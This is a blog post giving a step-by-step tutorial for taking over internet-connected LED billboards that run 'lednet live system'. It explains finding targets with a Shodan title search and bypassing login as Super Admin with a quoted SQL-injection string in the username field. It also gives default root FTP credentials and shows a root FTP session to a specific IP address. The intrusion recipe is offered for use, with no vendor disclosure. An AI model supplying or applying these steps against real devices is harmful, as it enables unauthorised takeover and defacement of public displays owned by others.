Hacking Digital Billboards

HACKED-BOARD

 

About a month ago a member of hack forums called Gangs posted a tutorial on how to hack digital billboards with a simple SQL injection, I thought it cant be that simple and tested it out myself, To my surprise, even in 2016 SQL injection is still a valid attack vector on sites connected to the internet, I’m guessing that’s why its still in the OWASP (Open Web Application Security Projects) Top 10.

Click this link to take you to the original post at hack forums http://hackforums.net/showthread.php?tid=5277277

First of all you need find some vulnerable billboards connected to the internet, to do this you need to create a free account at https://www.shodan.io/

Shodan is a search engine that lets the user find specific types of computers (Web Cams, routers, servers, etc.) connected to the internet using a variety of filters.

Once your registered at Shodan you can use the search feature to find our vulnerable billboards.

In the search box type title:”lednet live system” as pictured below

shoden led live system

 

 

and you should be presented with a list of results like this one in Egypt.

 

ledlivesite

When you click the link in Shodan it should take you directly to the site hosting the billboard system and you will be presented with a login.

ledlivelogin

So how to hack it? Well the Username Parameter is vulnerable to SQL Injection…

So to Login, paste in the username parameter…

-1558" OR 9005=9005 AND "UxGI"="UxGI

and anything in the password input. Now click login!

ledliveSQLI

 

Once logged in, take a look at the top right corner you should now be logged in as a Super Admin.

ledlivesuperadmin

From here you now have full access to the digital billboard and you can control everything from what shows on it, to changing all the display and power settings even enabling the built in WIFI and giving everyone free WIFI.

But wait that’s not all!!!!

There is another vulnerability in these billboards, which is a default root password vulnerability. You can basically get root FTP access to all of these billboards with the details below….

Username: root
Password: 111111

 

$ ftp 186.206.188.175
 Connected to 186.206.188.175.
 220 Welcome to blah FTP service.
 Name (186.206.188.175): root
 331 Please specify the password.
 Password:
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> cd /
 250 Directory successfully changed.ftp> passive
 Passive mode on.
 ftp> ls
 229 Entering Extended Passive Mode (|||41314|).
 150 Here comes the directory listing.
 drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
 drwxr-xr-x 7 0 0 0 May 21 18:08 dev
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
 drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
 lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
 drwxr-xr-x 1 0 0 36 Jan 01 1970 home
 drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
 lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
 drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
 drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
 dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
 drwxr-xr-x 1 0 0 116 Jan 01 1970 root
 drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
 drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
 drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
 drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
 drwxr-xr-x 3 0 0 672 Jan 01 1970 var
 drwxr-xr-x 4 0 0 288 Jan 01 1970 www
 226 Directory send OK.
 ftp>

You now have root access to the entire server.

I do think its poor show on the company that makes and sells this product to not have done proper security testing before going to market, which would have picked this up a simple SQL injection and even having a default root password on all your devices tut tut… but I bet there are different types of billboards with the same sort of issues.

 

1 thought on “Hacking Digital Billboards

Leave a Reply

Your email address will not be published. Required fields are marked *